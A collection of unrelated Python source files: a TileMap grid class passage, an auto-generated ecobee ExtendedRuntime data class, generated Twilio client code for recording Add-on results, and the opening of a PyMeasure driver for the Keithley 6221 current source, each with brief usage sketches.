                other_coord = value._local_to_storage(coord - tl)
                self.storage[self._local_to_storage(coord)] = value.storage[other_coord]
else:
if Coord.width(tl, br) == 1 and Coord.height(tl, br) == 1:
tl = self._local_to_storage(tl)
self.storage[tl] = value
else:
self.subview(tl=tl, br=br).fill(value)
def __contains__(self, value):
if isinstance(value, TileMap):
raise TypeError("__contains__ does not support TileMaps yet.")
for coord, __ in self.find(is_tile(value)):
return True
return False
def get(self, subscript):
try:
return self[subscript]
except IndexError:
return None
def find(self, predicate):
"""
        Return an iterable of `(coordinate, data)` pairs for which
        `predicate(tile_map, coord)` returns a truthy `data`.
"""
for coord in Coord.range(self.tl, self.br):
tile = self.storage[coord]
arg = self._storage_to_local(coord)
data = predicate(self, arg)
if data:
yield (arg, data)
def cast_until(self, start, increment, predicate):
"""
Return the first coordinate from `start` in steps
of `increment` where `predicate(tile_map, coord)` returns True.
        Raises ValueError if the predicate never returns True.
"""
coord = start
end = self._storage_to_local(self.br)
def in_range(coord):
return (coord.x < end.x and coord.y < end.y)
while in_range(coord) and not predicate(self, coord):
coord += increment
if in_range(coord):
return coord
else:
raise ValueError("Coordinate matching predicate not found.")
def copy(self):
subview = self.subview()
subview.storage = self.storage.copy()
return subview
def fill(self, value):
for coord in Coord.range(self.tl, self.br):
self.storage[coord] = value
def subview(self, tl=None, br=None):
"""Return a subview at the given location (default top left) and size (default maximum)."""
if tl is None:
tl = Coord(0, 0)
else:
tl = Coord.from_tuple(tl)
if br is None:
br = Coord(self.width, self.height)
else:
br = Coord.from_tuple(br)
tl = self._local_to_storage(tl)
br = self._local_to_storage(br)
return self.__class__(tl=tl, br=br, storage=self.storage)
def linearize(self):
"""Return a linear iterable of all values in this tile map."""
return (self.storage[coord] for coord in Coord.range(self.tl, self.br))
def split_x(self, x):
"""Return a pair of views that are the halves of the tile map split vertically at `x`."""
assert 0 <= x < self.width
return (
self.subview(tl=Coord(0, 0), br=Coord(x, self.height)),
self.subview(tl=Coord(x, 0), br=Coord(self.width, self.height))
)
def split_y(self, y):
"""Return a pair of views that are the halves of the tile map split horizontally at `y`."""
assert 0 <= y < self.height
return (
self.subview(tl=Coord(0, 0), br=Coord(self.width, y)),
self.subview(tl=Coord(0, y), br=Coord(self.width, self.height))
)
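# ---------------------------------------------------------------------------
# Minimal usage sketch (illustration only, not part of the original module):
# integer subscripts read or write single tiles, slice subscripts address a
# rectangular region, and subviews share storage with the parent map.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    tm = TileMap(width=4, height=3)
    tm[0:2, 0:2] = 5                      # fill a 2x2 region via slice subscripts
    tm[Coord(3, 0)] = 7                   # set a single tile
    assert Coord(3, 0) + Coord.Y == Coord(3, 1)
    right = tm.subview(tl=(2, 0), br=(4, 3))
    right.fill(9)                         # writes through to the shared storage
    assert tm[3, 0] == 9                  # the subview overwrote the single tile
    assert tm[1, 1] == 5
    print(tm)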
|
|
"""
This module is home to the ExtendedRuntime class
"""
from pyecobee.ecobee_object import EcobeeObject
class ExtendedRuntime(EcobeeObject):
"""
This class has been auto generated by scraping
https://www.ecobee.com/home/developer/api/documentation/v1/objects/ExtendedRuntime.shtml
Attribute names have been generated by converting ecobee property
names from camelCase to snake_case.
A getter property has been generated for each attribute.
A setter property has been generated for each attribute whose value
of READONLY is "no".
An __init__ argument without a default value has been generated if
the value of REQUIRED is "yes".
An __init__ argument with a default value of None has been generated
if the value of REQUIRED is "no".
"""
__slots__ = [
'_last_reading_timestamp',
'_runtime_date',
'_runtime_interval',
'_actual_temperature',
'_actual_humidity',
'_desired_heat',
'_desired_cool',
'_desired_humidity',
'_desired_dehumidity',
'_dm_offset',
'_hvac_mode',
'_heat_pump1',
'_heat_pump2',
'_aux_heat1',
'_aux_heat2',
'_aux_heat3',
'_cool1',
'_cool2',
'_fan',
'_humidifier',
'_dehumidifier',
'_economizer',
'_ventilator',
'_current_electricity_bill',
'_projected_electricity_bill',
]
attribute_name_map = {
'last_reading_timestamp': 'lastReadingTimestamp',
'lastReadingTimestamp': 'last_reading_timestamp',
'runtime_date': 'runtimeDate',
'runtimeDate': 'runtime_date',
'runtime_interval': 'runtimeInterval',
'runtimeInterval': 'runtime_interval',
'actual_temperature': 'actualTemperature',
'actualTemperature': 'actual_temperature',
'actual_humidity': 'actualHumidity',
'actualHumidity': 'actual_humidity',
'desired_heat': 'desiredHeat',
'desiredHeat': 'desired_heat',
'desired_cool': 'desiredCool',
'desiredCool': 'desired_cool',
'desired_humidity': 'desiredHumidity',
'desiredHumidity': 'desired_humidity',
'desired_dehumidity': 'desiredDehumidity',
'desiredDehumidity': 'desired_dehumidity',
'dm_offset': 'dmOffset',
'dmOffset': 'dm_offset',
'hvac_mode': 'hvacMode',
'hvacMode': 'hvac_mode',
'heat_pump1': 'heatPump1',
'heatPump1': 'heat_pump1',
'heat_pump2': 'heatPump2',
'heatPump2': 'heat_pump2',
'aux_heat1': 'auxHeat1',
'auxHeat1': 'aux_heat1',
'aux_heat2': 'auxHeat2',
'auxHeat2': 'aux_heat2',
'aux_heat3': 'auxHeat3',
'auxHeat3': 'aux_heat3',
'cool1': 'cool1',
'cool2': 'cool2',
'fan': 'fan',
'humidifier': 'humidifier',
'dehumidifier': 'dehumidifier',
'economizer': 'economizer',
'ventilator': 'ventilator',
'current_electricity_bill': 'currentElectricityBill',
'currentElectricityBill': 'current_electricity_bill',
'projected_electricity_bill': 'projectedElectricityBill',
'projectedElectricityBill': 'projected_electricity_bill',
}
attribute_type_map = {
'last_reading_timestamp': 'six.text_type',
'runtime_date': 'six.text_type',
'runtime_interval': 'int',
'actual_temperature': 'List[int]',
'actual_humidity': 'List[int]',
'desired_heat': 'List[int]',
'desired_cool': 'List[int]',
'desired_humidity': 'List[int]',
'desired_dehumidity': 'List[int]',
'dm_offset': 'List[int]',
'hvac_mode': 'List[six.text_type]',
'heat_pump1': 'List[int]',
'heat_pump2': 'List[int]',
'aux_heat1': 'List[int]',
'aux_heat2': 'List[int]',
'aux_heat3': 'List[int]',
'cool1': 'List[int]',
'cool2': 'List[int]',
'fan': 'List[int]',
'humidifier': 'List[int]',
'dehumidifier': 'List[int]',
'economizer': 'List[int]',
'ventilator': 'List[int]',
'current_electricity_bill': 'int',
'projected_electricity_bill': 'int',
}
def __init__(
self,
last_reading_timestamp=None,
runtime_date=None,
runtime_interval=None,
actual_temperature=None,
actual_humidity=None,
desired_heat=None,
desired_cool=None,
desired_humidity=None,
desired_dehumidity=None,
dm_offset=None,
hvac_mode=None,
heat_pump1=None,
heat_pump2=None,
aux_heat1=None,
aux_heat2=None,
aux_heat3=None,
cool1=None,
cool2=None,
fan=None,
humidifier=None,
dehumidifier=None,
economizer=None,
ventilator=None,
current_electricity_bill=None,
projected_electricity_bill=None,
):
"""
Construct an ExtendedRuntime instance
"""
self._last_reading_timestamp = last_reading_timestamp
self._runtime_date = runtime_date
self._runtime_interval = runtime_interval
self._actual_temperature = actual_temperature
self._actual_humidity = actual_humidity
self._desired_heat = desired_heat
self._desired_cool = desired_cool
self._desired_humidity = desired_humidity
self._desired_dehumidity = desired_dehumidity
self._dm_offset = dm_offset
self._hvac_mode = hvac_mode
self._heat_pump1 = heat_pump1
self._heat_pump2 = heat_pump2
self._aux_heat1 = aux_heat1
self._aux_heat2 = aux_heat2
self._aux_heat3 = aux_heat3
self._cool1 = cool1
self._cool2 = cool2
self._fan = fan
self._humidifier = humidifier
self._dehumidifier = dehumidifier
self._economizer = economizer
self._ventilator = ventilator
self._current_electricity_bill = current_electricity_bill
self._projected_electricity_bill = projected_electricity_bill
@property
def last_reading_timestamp(self):
"""
Gets the last_reading_timestamp attribute of this
ExtendedRuntime instance.
:return: The value of the last_reading_timestamp attribute of
this ExtendedRuntime instance.
:rtype: six.text_type
"""
return self._last_reading_timestamp
@property
def runtime_date(self):
"""
Gets the runtime_date attribute of this ExtendedRuntime
instance.
:return: The value of the runtime_date attribute of this
ExtendedRuntime instance.
:rtype: six.text_type
"""
return self._runtime_date
@property
def runtime_interval(self):
"""
Gets the runtime_interval attribute of this ExtendedRuntime
instance.
:return: The value of the runtime_interval attribute of this
ExtendedRuntime instance.
:rtype: int
"""
return self._runtime_interval
@property
def actual_temperature(self):
"""
Gets the actual_temperature attribute of this ExtendedRuntime
instance.
:return: The value of the actual_temperature attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._actual_temperature
@property
def actual_humidity(self):
"""
Gets the actual_humidity attribute of this ExtendedRuntime
instance.
:return: The value of the actual_humidity attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._actual_humidity
@property
def desired_heat(self):
"""
Gets the desired_heat attribute of this ExtendedRuntime
instance.
:return: The value of the desired_heat attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._desired_heat
@property
def desired_cool(self):
"""
Gets the desired_cool attribute of this ExtendedRuntime
instance.
:return: The value of the desired_cool attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._desired_cool
@property
def desired_humidity(self):
"""
Gets the desired_humidity attribute of this ExtendedRuntime
instance.
:return: The value of the desired_humidity attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._desired_humidity
@property
def desired_dehumidity(self):
"""
Gets the desired_dehumidity attribute of this ExtendedRuntime
instance.
:return: The value of the desired_dehumidity attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._desired_dehumidity
@property
def dm_offset(self):
"""
Gets the dm_offset attribute of this ExtendedRuntime instance.
:return: The value of the dm_offset attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._dm_offset
@property
def hvac_mode(self):
"""
Gets the hvac_mode attribute of this ExtendedRuntime instance.
:return: The value of the hvac_mode attribute of this
ExtendedRuntime instance.
:rtype: List[six.text_type]
"""
return self._hvac_mode
@property
def heat_pump1(self):
"""
Gets the heat_pump1 attribute of this ExtendedRuntime instance.
:return: The value of the heat_pump1 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._heat_pump1
@property
def heat_pump2(self):
"""
Gets the heat_pump2 attribute of this ExtendedRuntime instance.
:return: The value of the heat_pump2 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._heat_pump2
@property
def aux_heat1(self):
"""
Gets the aux_heat1 attribute of this ExtendedRuntime instance.
:return: The value of the aux_heat1 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._aux_heat1
@property
def aux_heat2(self):
"""
Gets the aux_heat2 attribute of this ExtendedRuntime instance.
:return: The value of the aux_heat2 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._aux_heat2
@property
def aux_heat3(self):
"""
Gets the aux_heat3 attribute of this ExtendedRuntime instance.
:return: The value of the aux_heat3 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._aux_heat3
@property
def cool1(self):
"""
Gets the cool1 attribute of this ExtendedRuntime instance.
:return: The value of the cool1 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._cool1
@property
def cool2(self):
"""
Gets the cool2 attribute of this ExtendedRuntime instance.
:return: The value of the cool2 attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._cool2
@property
def fan(self):
"""
Gets the fan attribute of this ExtendedRuntime instance.
:return: The value of the fan attribute of this ExtendedRuntime
instance.
:rtype: List[int]
"""
return self._fan
@property
def humidifier(self):
"""
Gets the humidifier attribute of this ExtendedRuntime instance.
:return: The value of the humidifier attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._humidifier
@property
def dehumidifier(self):
"""
Gets the dehumidifier attribute of this ExtendedRuntime
instance.
:return: The value of the dehumidifier attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._dehumidifier
@property
def economizer(self):
"""
Gets the economizer attribute of this ExtendedRuntime instance.
:return: The value of the economizer attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._economizer
@property
def ventilator(self):
"""
Gets the ventilator attribute of this ExtendedRuntime instance.
:return: The value of the ventilator attribute of this
ExtendedRuntime instance.
:rtype: List[int]
"""
return self._ventilator
@property
def current_electricity_bill(self):
"""
Gets the current_electricity_bill attribute of this
ExtendedRuntime instance.
:return: The value of the current_electricity_bill attribute of
this ExtendedRuntime instance.
:rtype: int
"""
return self._current_electricity_bill
@property
def projected_electricity_bill(self):
"""
Gets the projected_electricity_bill attribute of this
ExtendedRuntime instance.
:return: The value of the projected_electricity_bill attribute
of this ExtendedRuntime instance.
:rtype: int
"""
return self._projected_electricity_bill
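# -----------------------------------------------------------------------
# Minimal usage sketch (illustration only; the sample values are made up):
# ExtendedRuntime can be constructed directly with snake_case keyword
# arguments, while attribute_name_map records the mapping to the ecobee
# camelCase property names used by the API.
# -----------------------------------------------------------------------
if __name__ == '__main__':
    runtime = ExtendedRuntime(
        last_reading_timestamp='2021-01-01 12:00:00',
        runtime_date='2021-01-01',
        runtime_interval=300,
        actual_temperature=[721, 720, 719],
        hvac_mode=['heatStage1On', 'off', 'off'],
    )
    assert runtime.runtime_interval == 300
    assert ExtendedRuntime.attribute_name_map['actualTemperature'] == 'actual_temperature'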
|
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
from twilio.rest.api.v2010.account.recording.add_on_result.payload import PayloadList
class AddOnResultList(ListResource):
def __init__(self, version, account_sid, reference_sid):
"""
Initialize the AddOnResultList
:param Version version: Version that contains the resource
:param account_sid: The SID of the Account that created the resource
:param reference_sid: The SID of the recording to which the AddOnResult resource belongs
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultList
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultList
"""
super(AddOnResultList, self).__init__(version)
# Path Solution
self._solution = {'account_sid': account_sid, 'reference_sid': reference_sid, }
self._uri = '/Accounts/{account_sid}/Recordings/{reference_sid}/AddOnResults.json'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams AddOnResultInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'])
def list(self, limit=None, page_size=None):
"""
Lists AddOnResultInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
        :returns: List of up to limit AddOnResultInstance records
:rtype: list[twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of AddOnResultInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultPage
"""
data = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(method='GET', uri=self._uri, params=data, )
return AddOnResultPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of AddOnResultInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return AddOnResultPage(self._version, response, self._solution)
def get(self, sid):
"""
        Constructs an AddOnResultContext
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
"""
return AddOnResultContext(
self._version,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
sid=sid,
)
def __call__(self, sid):
"""
        Constructs an AddOnResultContext
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
"""
return AddOnResultContext(
self._version,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
sid=sid,
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.AddOnResultList>'
class AddOnResultPage(Page):
def __init__(self, version, response, solution):
"""
Initialize the AddOnResultPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param account_sid: The SID of the Account that created the resource
:param reference_sid: The SID of the recording to which the AddOnResult resource belongs
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultPage
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultPage
"""
super(AddOnResultPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of AddOnResultInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
"""
return AddOnResultInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
)
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.AddOnResultPage>'
class AddOnResultContext(InstanceContext):
def __init__(self, version, account_sid, reference_sid, sid):
"""
Initialize the AddOnResultContext
:param Version version: Version that contains the resource
:param account_sid: The SID of the Account that created the resource to fetch
:param reference_sid: The SID of the recording to which the result to fetch belongs
:param sid: The unique string that identifies the resource to fetch
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
"""
super(AddOnResultContext, self).__init__(version)
# Path Solution
self._solution = {'account_sid': account_sid, 'reference_sid': reference_sid, 'sid': sid, }
self._uri = '/Accounts/{account_sid}/Recordings/{reference_sid}/AddOnResults/{sid}.json'.format(**self._solution)
# Dependents
self._payloads = None
def fetch(self):
"""
Fetch the AddOnResultInstance
:returns: The fetched AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return AddOnResultInstance(
self._version,
payload,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
sid=self._solution['sid'],
)
def delete(self):
"""
Deletes the AddOnResultInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete(method='DELETE', uri=self._uri, )
@property
def payloads(self):
"""
Access the payloads
:returns: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList
"""
if self._payloads is None:
self._payloads = PayloadList(
self._version,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
add_on_result_sid=self._solution['sid'],
)
return self._payloads
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Api.V2010.AddOnResultContext {}>'.format(context)
class AddOnResultInstance(InstanceResource):
class Status(object):
CANCELED = "canceled"
COMPLETED = "completed"
DELETED = "deleted"
FAILED = "failed"
IN_PROGRESS = "in-progress"
INIT = "init"
PROCESSING = "processing"
QUEUED = "queued"
def __init__(self, version, payload, account_sid, reference_sid, sid=None):
"""
Initialize the AddOnResultInstance
:returns: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
"""
super(AddOnResultInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload.get('sid'),
'account_sid': payload.get('account_sid'),
'status': payload.get('status'),
'add_on_sid': payload.get('add_on_sid'),
'add_on_configuration_sid': payload.get('add_on_configuration_sid'),
'date_created': deserialize.rfc2822_datetime(payload.get('date_created')),
'date_updated': deserialize.rfc2822_datetime(payload.get('date_updated')),
'date_completed': deserialize.rfc2822_datetime(payload.get('date_completed')),
'reference_sid': payload.get('reference_sid'),
'subresource_uris': payload.get('subresource_uris'),
}
# Context
self._context = None
self._solution = {
'account_sid': account_sid,
'reference_sid': reference_sid,
'sid': sid or self._properties['sid'],
}
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: AddOnResultContext for this AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultContext
"""
if self._context is None:
self._context = AddOnResultContext(
self._version,
account_sid=self._solution['account_sid'],
reference_sid=self._solution['reference_sid'],
sid=self._solution['sid'],
)
return self._context
@property
def sid(self):
"""
:returns: The unique string that identifies the resource
:rtype: unicode
"""
return self._properties['sid']
@property
def account_sid(self):
"""
:returns: The SID of the Account that created the resource
:rtype: unicode
"""
return self._properties['account_sid']
@property
def status(self):
"""
:returns: The status of the result
:rtype: AddOnResultInstance.Status
"""
return self._properties['status']
@property
def add_on_sid(self):
"""
:returns: The SID of the Add-on to which the result belongs
:rtype: unicode
"""
return self._properties['add_on_sid']
@property
def add_on_configuration_sid(self):
"""
:returns: The SID of the Add-on configuration
:rtype: unicode
"""
return self._properties['add_on_configuration_sid']
@property
def date_created(self):
"""
:returns: The RFC 2822 date and time in GMT that the resource was created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The RFC 2822 date and time in GMT that the resource was last updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def date_completed(self):
"""
:returns: The date and time in GMT that the result was completed
:rtype: datetime
"""
return self._properties['date_completed']
@property
def reference_sid(self):
"""
:returns: The SID of the recording to which the AddOnResult resource belongs
:rtype: unicode
"""
return self._properties['reference_sid']
@property
def subresource_uris(self):
"""
:returns: A list of related resources identified by their relative URIs
:rtype: unicode
"""
return self._properties['subresource_uris']
def fetch(self):
"""
Fetch the AddOnResultInstance
:returns: The fetched AddOnResultInstance
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.AddOnResultInstance
"""
return self._proxy.fetch()
def delete(self):
"""
Deletes the AddOnResultInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete()
@property
def payloads(self):
"""
Access the payloads
:returns: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList
:rtype: twilio.rest.api.v2010.account.recording.add_on_result.payload.PayloadList
"""
return self._proxy.payloads
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Api.V2010.AddOnResultInstance {}>'.format(context)
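# -----------------------------------------------------------------------
# Minimal usage sketch (illustration only; the SIDs below are placeholders):
# in normal use these classes are reached through twilio.rest.Client rather
# than constructed directly.
# -----------------------------------------------------------------------
if __name__ == '__main__':
    from twilio.rest import Client
    client = Client('ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX', 'your_auth_token')
    recording = client.recordings('REXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
    # List the Add-on results attached to the recording.
    for result in recording.add_on_results.list(limit=20):
        print(result.sid, result.status)
    # Fetch a single result through the context returned by get()/__call__().
    result = recording.add_on_results('XRXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX').fetch()
    # Payloads are a further subresource of the result.
    for payload in result.payloads.list():
        print(payload.sid)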
|
|
#
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2021 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import logging
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
from pymeasure.instruments import Instrument, RangeException
from pymeasure.adapters import PrologixAdapter
from pymeasure.instruments.validators import truncated_range, strict_discrete_set
from .buffer import KeithleyBuffer
import numpy as np
import time
from io import BytesIO
import re
class Keithley6221(Instrument, KeithleyBuffer):
""" Represents the Keithely 6221 AC and DC current source and provides a
high-level interface for interacting with the instrument.
.. code-block:: python
keithley = Keithley6221("GPIB::1")
keithley.clear()
# Use the keithley as an AC source
keithley.waveform_function = "square" # Set a square waveform
keithley.waveform_amplitude = 0.05 # Set the amplitude in Amps
keithley.waveform_offset = 0 # Set zero offset
keithley.source_compliance = 10 # Set compliance (limit) in V
keithley.waveform_dutycycle = 50 # Set duty cycle of wave in %
keithley.waveform_frequency = 347 # Set the frequency in Hz
keithley.waveform_ranging = "best" # Set optimal output ranging
keithley.waveform_duration_cycles = 100 # Set duration of the waveform
# Link end of waveform to Service Request status bit
keithley.operation_event_enabled = 128 # OSB listens to end of wave
keithley.srq_event_enabled = 128 # SRQ listens to OSB
keithley.waveform_arm() # Arm (load) the waveform
keithley.waveform_start() # Start the waveform
keithley.adapter.wait_for_srq() # Wait for the pulse to finish
keithley.waveform_abort() # Disarm (unload) the waveform
keithley.shutdown() # Disables output
"""
##########
# OUTPUT #
##########
source_enabled = Instrument.control(
"OUTPut?", "OUTPut %d",
"""A boolean property that controls whether the source is enabled, takes
values True or False. The convenience methods :meth:`~.Keithley6221.enable_source` and
:meth:`~.Keithley6221.disable_source` can also be used.""",
validator=strict_discrete_set,
values={True: 1, False: 0},
map_values=True
)
source_delay = Instrument.control(
":SOUR:DEL?", ":SOUR:DEL %g",
""" A floating point property that sets a manual delay for the source
after the output is turned on before a measurement is taken. When this
property is set, the auto delay is turned off. Valid values are
between 1e-3 [seconds] and 999999.999 [seconds].""",
validator=truncated_range,
values=[1e-3, 999999.999],
)
##########
# SOURCE #
##########
source_current = Instrument.control(
":SOUR:CURR?", ":SOUR:CURR %g",
""" A floating point property that controls the source current
in Amps. """,
validator=truncated_range,
values=[-0.105, 0.105]
)
source_compliance = Instrument.control(
":SOUR:CURR:COMP?", ":SOUR:CURR:COMP %g",
"""A floating point property that controls the compliance of the current
        source in Volts. Valid values are in range 0.1 [V] to 105 [V].""",
validator=truncated_range,
values=[0.1, 105])
source_range = Instrument.control(
":SOUR:CURR:RANG?", ":SOUR:CURR:RANG:AUTO 0;:SOUR:CURR:RANG %g",
""" A floating point property that controls the source current
range in Amps, which can take values between -0.105 A and +0.105 A.
Auto-range is disabled when this property is set. """,
validator=truncated_range,
values=[-0.105, 0.105]
)
source_auto_range = Instrument.control(
":SOUR:CURR:RANG:AUTO?", ":SOUR:CURR:RANG:AUTO %d",
""" A boolean property that controls the auto range of the current source.
Valid values are True or False. """,
values={True: 1, False: 0},
map_values=True,
)
##################
# WAVE FUNCTIONS #
##################
waveform_function = Instrument.control(
":SOUR:WAVE:FUNC?", ":SOUR:WAVE:FUNC %s",
""" A string property that controls the selected wave function. Valid
values are "sine", "ramp", "square", "arbitrary1", "arbitrary2",
"arbitrary3" and "arbitrary4". """,
values={
"sine": "SIN",
"ramp": "RAMP",
"square": "SQU",
"arbitrary1": "ARB1",
"arbitrary2": "ARB2",
"arbitrary3": "ARB3",
"arbitrary4": "ARB4",
},
map_values=True
)
waveform_frequency = Instrument.control(
":SOUR:WAVE:FREQ?", ":SOUR:WAVE:FREQ %g",
"""A floating point property that controls the frequency of the
waveform in Hertz. Valid values are in range 1e-3 to 1e5. """,
validator=truncated_range,
values=[1e-3, 1e5]
)
waveform_amplitude = Instrument.control(
":SOUR:WAVE:AMPL?", ":SOUR:WAVE:AMPL %g",
"""A floating point property that controls the (peak) amplitude of the
waveform in Amps. Valid values are in range 2e-12 to 0.105. """,
validator=truncated_range,
values=[2e-12, 0.105]
)
waveform_offset = Instrument.control(
":SOUR:WAVE:OFFS?", ":SOUR:WAVE:OFFS %g",
"""A floating point property that controls the offset of the waveform
in Amps. Valid values are in range -0.105 to 0.105. """,
validator=truncated_range,
values=[-0.105, 0.105]
)
waveform_dutycycle = Instrument.control(
":SOUR:WAVE:DCYC?", ":SOUR:WAVE:DCYC %g",
"""A floating point property that controls the duty-cycle of the
waveform in percent for the square and ramp waves. Valid values are in
range 0 to 100. """,
validator=truncated_range,
values=[0, 100]
)
waveform_duration_time = Instrument.control(
